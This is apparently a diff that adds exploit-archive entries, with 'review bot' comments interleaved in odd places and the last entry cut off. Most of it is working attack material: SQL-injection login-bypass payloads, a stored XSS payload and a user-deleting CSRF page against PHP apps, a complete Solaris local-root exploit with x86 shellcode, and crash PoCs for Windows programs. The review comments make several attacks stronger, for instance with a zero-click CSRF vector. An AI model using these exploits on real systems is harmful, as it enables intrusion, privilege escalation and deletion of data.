+# Exploit Title: User Management System 2.0 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+------ Details:
+
+1- Vulnerable code is here (admin login: /admin/index.php):
+
+<?php
+session_start();
+include("dbconnection.php");
+if(isset($_POST['login']))
+{
+ $adminusername=$_POST['username'];
+ $pass=md5($_POST['password']);
+ $ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$adminusername' and password='$pass'");
+ $num=mysqli_fetch_array($ret);
+if($num>0)
+{
+ $extra="manage-users.php";
+ $_SESSION['login']=$_POST['username'];
+ $_SESSION['id']=$num['id'];
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+else
+{
+ $_SESSION['action1']="*Invalid username or password";
+ $extra="index.php";
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+}
+
+2- We can bypass authentication with SQLi:
+
+Bypass code (user and admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
\ No newline at end of file
diff --git a/exploits/php/webapps/48370.txt b/exploits/php/webapps/48370.txt
new file mode 100644
index 000000000..7f1ad6b7c
--- /dev/null
+++ b/exploits/php/webapps/48370.txt
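Review bot: The bypass only needs the injection in `username`; the password field goes through `md5()` before it reaches the query (`$pass=md5($_POST['password'])`), so the `Password : pentester' or'1'=1#` line contributes nothing and should be described as arbitrary, e.g. `Password : anything (hashed before use, not injectable here)`. With `#` commenting out the remainder of the WHERE clause the query returns the whole `admin` table and `$num['id']` is whatever row comes first, so the session is bound to the first admin rather than a chosen one; a payload of the form `admin' or username='admin'#` would be more precise. The text claims the bypass works on the "user and admin login panel" but only the admin code is shown, so the user-login claim should be marked as untested or the code quoted. `if($num>0)` relies on PHP's loose comparison, where any fetched row array compares greater than 0, which is why any non-empty result set passes.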
@@ -0,0 +1,42 @@
+# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here: http://localhost/cms/users/registration.php
+2- Vulnerable code:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['submit']))
+{
+$fullname=$_POST['fullname'];
+$email=$_POST['email'];
+$password=md5($_POST['password']);
+$contactno=$_POST['contactno'];
+$status=1;
+$query=mysqli_query($con,"insert into
+users(fullName,userEmail,password,contactNo,status)
+values('$fullname','$email','$password','$contactno','$status')");
+$msg="Registration successfull. Now You can login !";
+}
+?>
+
+3- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<tr>
+<td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td>
+</tr>
+
+4- If we insert "fullName" as "script>prompt(2)</script>", we can perform
+this attack as "Stored XSS"
+
+5- Picture in the Attachemnt
+---------------------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48371.txt b/exploits/php/webapps/48371.txt
new file mode 100644
index 000000000..681c6b849
--- /dev/null
+++ b/exploits/php/webapps/48371.txt
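Review bot: The payload in step 4, `"script>prompt(2)</script>"`, lacks the opening `<` and would appear as literal text; it should be `"<script>prompt(2)</script>"`. Step 5 refers to a picture "in the Attachemnt", but a text file cannot carry one, so the line should be dropped or replaced by a sentence saying what the screenshot showed (which admin page renders `fullName`). The sink shown, `<?php echo $row['fullName'];?>'s profile`, is where `htmlspecialchars()` belongs; the same `insert into users(...)` also concatenates `$fullname`/`$email`/`$contactno` unescaped, which is the SQL injection that 48371 exploits on the login side and is worth a sentence here.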
@@ -0,0 +1,40 @@
+# Exploit Title: Complaint Management System 4.2 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+if(isset($_POST['submit']))
+{
+$username=$_POST['username'];
+$password=md5($_POST['password']);
+$ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$username' and password='$password'");
+$num=mysqli_fetch_array($ret);
+if($num>0)
+{
+$extra="change-password.php";//
+$_SESSION['alogin']=$_POST['username'];
+$_SESSION['id']=$num['id'];
+$host=$_SERVER['HTTP_HOST'];
+$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
+header("location:http://$host$uri/$extra");
+exit();
+}
+
+2- We can bypass authentication with SQLi:
+
+Bypass code (admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
+-----------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48372.txt b/exploits/php/webapps/48372.txt
new file mode 100644
index 000000000..61f2dda41
--- /dev/null
+++ b/exploits/php/webapps/48372.txt
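Review bot: Only `username` is injectable here — `$password=md5($_POST['password'])` hashes the second field before it reaches the query — so the `Password :` line should say the value is irrelevant instead of repeating the payload. The quoted block stops at `exit(); }` with the outer `if` still open, which reads as a transcription cut; either close it or add `// ... else branch omitted`. The redirect builds `Location` from `$_SERVER['HTTP_HOST']`, so a forged Host header on the login POST appears to control where the browser is sent after login; if confirmed, that is a secondary finding worth one line. `$num['id']` is taken from the first row the wildcard WHERE returns, so the session is bound to whichever admin row sorts first, not to a chosen account.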
@@ -0,0 +1,29 @@
+# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+*************************************************
+Detail:
+
+You can perform CSRF Attack for all the functions.
+
+----------------------------------------------
+
+CSRF PoC for Delete User
+----------------------------------------------
+This request performs over the GET request with uid.
+------------------------------------------------------------------------
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://localhost/cms/admin/manage-users.php">
+<input type="hidden" name="uid" value="4" />
+<input type="hidden" name="" value="" />
+<input type="hidden" name="action" value="del" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/solaris/local/48359.c b/exploits/solaris/local/48359.c
new file mode 100644
index 000000000..1895c1312
--- /dev/null
+++ b/exploits/solaris/local/48359.c
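Review bot: The PoC needs the victim to click a submit button, yet the delete is triggered by a plain GET (`manage-users.php?uid=4&action=del`), so the stronger point — a state-changing action on GET with no token — can be shown with a zero-interaction vector such as `<img src="http://localhost/cms/admin/manage-users.php?uid=4&action=del">` or by adding `<script>document.forms[0].submit()</script>` before `</body>`. The empty `<input type="hidden" name="" value="" />` is a generator artifact and should be removed. "You can perform CSRF Attack for all the functions" is asserted without evidence; either list the other endpoints that were tested or scope the claim to the delete action. `uid=4` should be called out as the target user id the tester must adjust.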
@@ -0,0 +1,320 @@ +# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation +# Date: 2020-04-21 +# Author: Marco Ivaldi +# Vendor: www.oracle.com +# CVE: CVE-2020-2944 + +/* + * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel + * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info> + * + * A buffer overflow in the _SanityCheck() function in the Common Desktop + * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and + * earlier allows local users to gain root privileges via a long calendar name + * or calendar owner passed to sdtcm_convert in a malicious calendar file + * (CVE-2020-2944). + * + * The open source version of CDE (based on the CDE 2.x codebase) is not + * affected, because it does not ship the vulnerable binary. + * + * "CDE, the gift that keeps on giving" -- @0xdea + * "Feels more like a curse you can't break from this side." -- @alanc + * + * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack + * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory + * space, try returning to sprintf() instead of strcpy(). + * + * I haven't written a Solaris/SPARC version because I don't have a SPARC box + * on which Solaris 10 can run. If anybody is kind enough to give me access to + * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. + * + * Usage: + * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall + * $ ./raptor_sdtcm_conv + * [...] + * Do you want to correct it? (Y/N) [Y] n + * # id + * uid=0(root) gid=1(other) egid=12(daemon) + * # + * + * This should work with any common configuration on the first try. 
To + * re-enable rpc.cmsd, clear its service maintenance status by running the + * following commands as root: + * # /usr/sbin/svcadm clear cde-calendar-manager + * # /usr/bin/svcs -a | grep calendar + * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default + * + * Tested on: + * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) + * [previous Solaris versions are also likely vulnerable] + */ + +#include <fcntl.h> +#include <link.h> +#include <procfs.h> +#include <stdio.h> +#include <stdlib.h> +#include <strings.h> +#include <unistd.h> +#include <sys/stat.h> +#include <sys/systeminfo.h> +#include <sys/types.h> + +#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel" +#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>" + +#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program +#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility +#define BUFSIZE 2304 // size of the name/owner +#define PAYSIZE 1024 // size of the payload +#define OFFSET env_len / 2 // offset to the shellcode + +char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ +/* double setuid() */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +/* execve() */ +"\x31\xc0\x50\x68/ksh\x68/bin" +"\x89\xe3\x50\x53\x89\xe2\x50" +"\x52\x53\xb0\x3b\x50\xcd\x91"; + +/* globals */ +char *env[256]; +int env_pos = 0, env_len = 0; + +/* prototypes */ +int add_env(char *string); +void check_zero(int addr, char *pattern); +int search_ldso(char *sym); +int search_rwx_mem(void); +void set_val(char *buf, int pos, int val); + +/* + * main() + */ +int main(int argc, char **argv) +{ + char buf[BUFSIZE], payload[PAYSIZE]; + char platform[256], release[256], hostname[256]; + int i, payaddr; + + char *arg[3] = {"foo", "hax0r", NULL}; + int sb = ((int)argv[0] | 0xfff); /* stack base */ + int ret = search_ldso("strcpy"); /* or sprintf */ + int rwx_mem = search_rwx_mem(); /* rwx memory */ + + char cmd[1024]; 
+ FILE *fp; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* read command line */ + if (argc != 1) { + fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]); + fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n"); + exit(1); + } + + /* get system information */ + sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); + sysinfo(SI_RELEASE, release, sizeof(release) - 1); + sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1); + + /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ + memset(payload, '\x90', PAYSIZE); + payload[PAYSIZE - 1] = 0x0; + memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); + + /* fill the envp, keeping padding */ + add_env(payload); + add_env("HOME=/tmp"); + add_env(NULL); + + /* calculate the payload address */ + payaddr = sb - OFFSET; + + /* prepare the evil palette name */ + memset(buf, 'A', sizeof(buf)); + buf[sizeof(buf) - 1] = 0x0; + + /* fill with function address in ld.so.1, saved eip, and arguments */ + for (i = 0; i < BUFSIZE - 16; i += 4) { + set_val(buf, i, ret); /* strcpy */ + set_val(buf, i += 4, rwx_mem); /* saved eip */ + set_val(buf, i += 4, rwx_mem); /* 1st argument */ + set_val(buf, i += 4, payaddr); /* 2nd argument */ + } + + /* print some output */ + fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); + fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname); + fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); + fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); + fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); + fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); + + /* create the evil calendar file */ + fprintf(stderr, "Preparing the evil calendar file... 
"); + snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname); + if (system(cmd) == -1) { + perror("Error creating calendar file"); + exit(1); + } + if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) { + perror("Error creating calendar file"); + exit(1); + } + + /* prepare the evil calendar file (badchars currently not handled) */ + fp = fopen("/usr/spool/calendar/callog.hax0r", "w"); + if (!fp) { + perror("Error preparing calendar file"); + exit(1); + } + fprintf(fp, "Version: 4\n(calendarattributes " + "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\"," + "\"10:access_list\",\"world:2\")\n"); + /* buffer overflow in calendar name */ + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"%s\")\n", buf); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"fnord\")\n)"); + /* buffer overflow in calendar owner */ + /* + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"hax0r\")\n"); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"%s\")\n)", buf); + */ + fclose(fp); + + fprintf(stderr, "Done.\n"); + + /* run the vulnerable program */ + fprintf(stderr, "Exploiting... 
Please answer \"n\" when prompted.\n"); + execve(VULN, arg, env); + perror("execve"); + exit(0); +} + +/* + * add_env(): add a variable to envp and pad if needed + */ +int add_env(char *string) +{ + int i; + + /* null termination */ + if (!string) { + env[env_pos] = NULL; + return env_len; + } + + /* add the variable to envp */ + env[env_pos] = string; + env_len += strlen(string) + 1; + env_pos++; + + /* pad the envp using zeroes */ + if ((strlen(string) + 1) % 4) + for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { + env[env_pos] = string + strlen(string); + env_len++; + } + + return env_len; +} + +/* + * check_zero(): check an address for the presence of a 0x00 + */ +void check_zero(int addr, char *pattern) +{ + if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || + !(addr & 0xff000000)) { + fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); + exit(1); + } +} + +/* + * search_ldso(): search for a symbol inside ld.so.1 + */ +int search_ldso(char *sym) +{ + int addr; + void *handle; + Link_map *lm; + + /* open the executable object file */ + if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { + perror("dlopen"); + exit(1); + } + + /* get dynamic load information */ + if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { + perror("dlinfo"); + exit(1); + } + + /* search for the address of the symbol */ + if ((addr = (int)dlsym(handle, sym)) == NULL) { + fprintf(stderr, "Sorry, function %s() not found\n", sym); + exit(1); + } + + /* close the executable object file */ + dlclose(handle); + + check_zero(addr - 4, sym); + return addr; +} + +/* + * search_rwx_mem(): search for an RWX memory segment valid for all + * programs (typically, /usr/lib/ld.so.1) using the proc filesystem + */ +int search_rwx_mem(void) +{ + int fd; + char tmp[16]; + prmap_t map; + int addr = 0, addr_old; + + /* open the proc filesystem */ + sprintf(tmp,"/proc/%d/map", (int)getpid()); + if ((fd = open(tmp, O_RDONLY)) < 0) { + fprintf(stderr, "Can't open 
%s\n", tmp); + exit(1); + } + + /* search for the last RWX memory segment before stack (last - 1) */ + while (read(fd, &map, sizeof(map))) + if (map.pr_vaddr) + if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { + addr_old = addr; + addr = map.pr_vaddr; + } + close(fd); + + /* add 4 to the exact address NULL bytes */ + if (!(addr_old & 0xff)) + addr_old |= 0x04; + if (!(addr_old & 0xff00)) + addr_old |= 0x0400; + + return addr_old; +} + +/* + * set_val(): copy a dword inside a buffer (little endian) + */ +void set_val(char *buf, int pos, int val) +{ + buf[pos] = (val & 0x000000ff); + buf[pos + 1] = (val & 0x0000ff00) >> 8; + buf[pos + 2] = (val & 0x00ff0000) >> 16; + buf[pos + 3] = (val & 0xff000000) >> 24; +} \ No newline at end of file diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py new file mode 100755 index 000000000..a91229f95 --- /dev/null +++ b/exploits/windows/dos/48284.py 
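Review bot: `sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1)` in main() sizes the call by the wrong buffer; it works only because `release` and `hostname` are both 256 bytes and should read `sysinfo(SI_HOSTNAME, hostname, sizeof(hostname) - 1)`. In search_rwx_mem(), `char tmp[16]` receives `sprintf(tmp, "/proc/%d/map", getpid())`, which needs 17 bytes including the terminator once the pid reaches six digits, so this should be `char tmp[32]` with `snprintf(tmp, sizeof(tmp), "/proc/%d/map", (int)getpid())`; `addr_old` is also never initialised and is returned as garbage if fewer than two RWX mappings are seen. The exploit-db `# Title:`…`# CVE:` lines precede the opening `/*`, so the file as committed is not valid C and the `gcc raptor_sdtcm_conv.c` line in the usage comment only works after those lines are stripped. `dlmopen`/`dlsym`/`dlinfo` are used without an explicit `#include <dlfcn.h>`; presumably `<link.h>` pulls it in on Solaris, but an explicit include would make that intent clear.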
@@ -0,0 +1,35 @@
+# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.2.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py
new file mode 100755
index 000000000..12369a016
--- /dev/null
+++ b/exploits/windows/dos/48285.py
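Review bot: The bare `except:` closing the `try` block also swallows `KeyboardInterrupt` and `SystemExit`, and if `f.write` raises, the handle opened two lines earlier is never closed; `with open("POC.txt", "w") as f: f.write(buff)` for the write and `except (IOError, OSError) as e:` for the handler fix both. The `#!/usr/bin/env python` line sits after the comment header, so it is an ordinary comment and does not select an interpreter — a shebang only takes effect on line 1. `buff = "\x41" *500` followed by `buff += "\x41" * 500` is simply `"A" * 1000` and reads clearer as such. The same script appears verbatim in 48285.py and 48286.py, where these points apply too; all three use Python 2 `print` statements, which the header should state.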
@@ -0,0 +1,36 @@
+# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
+# Exploit Author: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: https://www.spotauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested Version: 5.3.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords,
+# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
+# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20
+# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run SpotAuditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py
new file mode 100755
index 000000000..ce265c73f
--- /dev/null
+++ b/exploits/windows/dos/48286.py
@@ -0,0 +1,39 @@
+# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py
new file mode 100755
index 000000000..01d5a7147
--- /dev/null
+++ b/exploits/windows/dos/48287.py
@@ -0,0 +1,26 @@
+# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
+# Date: 2020-04-05
+# Exploit Author: inter
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Vulnerable Software: Firgate
+# Version: 3.36
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: crash.py
+# 2.- Copy content to clipboard
+# 3.- Open "Frigate3.exe"
+# 4.- Go to "Disk" > Find Computer
+# 5.- Paste ClipBoard into the "Computer Name:" field
+# 6.- Click on OK
+# 7.- Crashed
+
+#Python "crash.py" Code:
+
+buffer = "\x41" * 2000
+f = open ("Frigate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py
new file mode 100755
index 000000000..e0a122ff7
--- /dev/null
+++ b/exploits/windows/dos/48288.py
@@ -0,0 +1,23 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
+#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Repeater host" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py
new file mode 100755
index 000000000..eee1b4ddc
--- /dev/null
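Review bot: `f = open ("Frigate.txt", "w")` followed by `f.write(buffer)` and `f.close()` leaves the handle open if the write raises; `with open("Frigate.txt", "w") as f: f.write(buffer)` is the idiomatic form and is shorter. The same open/write/close pattern is repeated in 48288.py, 48290.py, 48291.py, 48292.txt, 48302.py and 48305.py, where the same change applies. The header line `# Vulnerable Software: Firgate` misspells the product name used on the title line. 48292.txt carries a Python script and its own steps refer to running `ZOC_7.25.5_PrivateKeyFile.py`, so it should either be committed with a `.py` extension like its siblings or its steps should say the file must be renamed before it is run.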
+++ b/exploits/windows/dos/48290.py
@@ -0,0 +1,24 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
+#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Password" Paste Clipboard
+#6.- Click on "OK"
+#7.- Click on "Propieties"
+#8.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py
new file mode 100755
index 000000000..f926016a6
--- /dev/null
+++ b/exploits/windows/dos/48291.py
@@ -0,0 +1,22 @@
+# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
+#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt
new file mode 100644
index 000000000..7155a42ed
--- /dev/null
+++ b/exploits/windows/dos/48292.txt
@@ -0,0 +1,22 @@
+# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
+#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files...
+#5.- Select "Private key file:" field erease and Paste ClipBoard
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+buffer = "\x41" * 2000
+f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py
new file mode 100755
index 000000000..1f658e2bd
--- /dev/null
+++ b/exploits/windows/dos/48302.py
@@ -0,0 +1,21 @@
+# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
+# 2.- Open ZOC Terminal
+# 3.- Select Script > Start REXX Script...
+# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
+# 5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('ZOC_7.25.5_Script.zrx', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py
new file mode 100755
index 000000000..0771d435c
--- /dev/null
+++ b/exploits/windows/dos/48305.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-05-02
+# Vendor Homepage: https://www.celestialsoftware.net/
